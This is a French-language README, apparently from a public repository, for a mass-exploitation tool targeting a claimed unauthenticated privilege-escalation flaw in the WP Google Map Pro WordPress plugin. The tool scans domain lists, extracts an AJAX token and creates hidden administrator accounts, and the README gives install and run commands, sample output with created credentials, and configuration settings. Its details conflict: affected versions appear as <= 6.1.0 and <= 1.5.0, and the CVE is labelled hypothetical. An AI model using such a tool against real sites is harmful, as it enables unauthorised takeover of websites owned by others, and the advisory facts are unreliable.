
WP Maps Pro <= 6.1.0 - Élévation de privilèges non authentifiée via la création d'un compte administrateur à l'action AJAX wpgmp_temp_access_ajax
Cet outil exploite CVE-2026-8732, une vulnérabilité dans le plugin WP Google Map Pro pour WordPress. La vulnérabilité permet à un attaquant non authentifié d'obtenir un wpmp_token valide via un endpoint AJAX (admin-ajax.php?action=wpgmp_temp_access_ajax). En utilisant ce token, un attaquant peut accéder au panneau d'administration WordPress et créer un nouvel utilisateur administrateur.
L'outil effectue une analyse de masse à partir d'une liste de domaines, extrait le nonce et le token, puis crée automatiquement un compte administrateur caché sur les sites vulnérables. Les résultats sont enregistrés en temps réel avec les détails complets du token.
⚠️ AVIS DE NON-RESPONSABILITÉ : Cet outil est destiné uniquement à des tests de sécurité éducatifs et autorisés. Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de tester. L'auteur n'est pas responsable de toute mauvaise utilisation.
Vous pouvez voir plus d'avertissements sur la page de couverture de Jenderal92. Consultez-le ICI !!!
admin_created.txthttp:// et https://requestsInstallez la bibliothèque requise :
pip install requests
🚀 Installation
git clone https://github.com/Jenderal92/CVE-2026-8732.git
cd CVE-2026-8732
🎯 Utilisation
Préparez un fichier de liste de cibles (un domaine par ligne) :
example.com
https://target-website.com
http://vulnerable-site.org
Lancez le scanner :
python2 exploit.py targets.txt
Fichiers de sortie
Contenu du fichier res.txt Domaines vulnérables avec le token complet et l'URL de redirection (le cas échéant) admin_created.txt Identifiants administrateur créés avec succès (domaine, nom d'utilisateur, mot de passe, email)
Exemple de sortie
[*] Checking: https://example.com
[VULNERABLE] https://example.com -> Token found
[*] https://example.com -> Accessing redirect URL...
[+] https://example.com -> Admin created: securityaudit_1734567890 / StrongP@ssw0rd123!
⚙️ Configuration
Modifiez les variables suivantes dans le script :
TIMEOUT = 10 # Request timeout in seconds
JUMLAH_THREAD = 10 # Number of concurrent threads
OUTPUT_FILE = "res.txt" # File for vulnerable results
ADMIN_FILE = "admin_created.txt"
BASE_USERNAME = "securityaudit"
NEW_PASSWORD = "StrongP@ssw0rd123!"
NEW_EMAIL = "[email protected]"
🧠 Comment ça fonctionne
🛡️ Atténuation
· Mettez à jour WP Google Map Pro vers la dernière version corrigée. · Désactivez l'action AJAX wpgmp_temp_access_ajax via du code personnalisé ou un pare-feu. · Utilisez un pare-feu applicatif web (WAF) pour bloquer les requêtes malveillantes vers admin-ajax.php.
⭐ Clause de non-responsabilité
Ce logiciel est fourni « AS IS » sans garantie d'aucune sorte. L'intégralité du risque quant à la qualité et aux performances du logiciel vous incombe. Utilisez-le de manière responsable et uniquement sur les systèmes que vous êtes autorisé à tester.
| Champ | Valeur |
|---|
| ID CVE | CVE-2026-8732 (hypothétique pour ce plugin) |
| Plugin affecté | WP Google Map Pro (versions <= 1.5.0) |
| Type de vulnérabilité | Contrôle d'accès cassé / Élévation de privilèges |
| Vecteur d'attaque | Non authentifié, à distance |
| Impact | Prise de contrôle complète du site via la création d'un compte administrateur |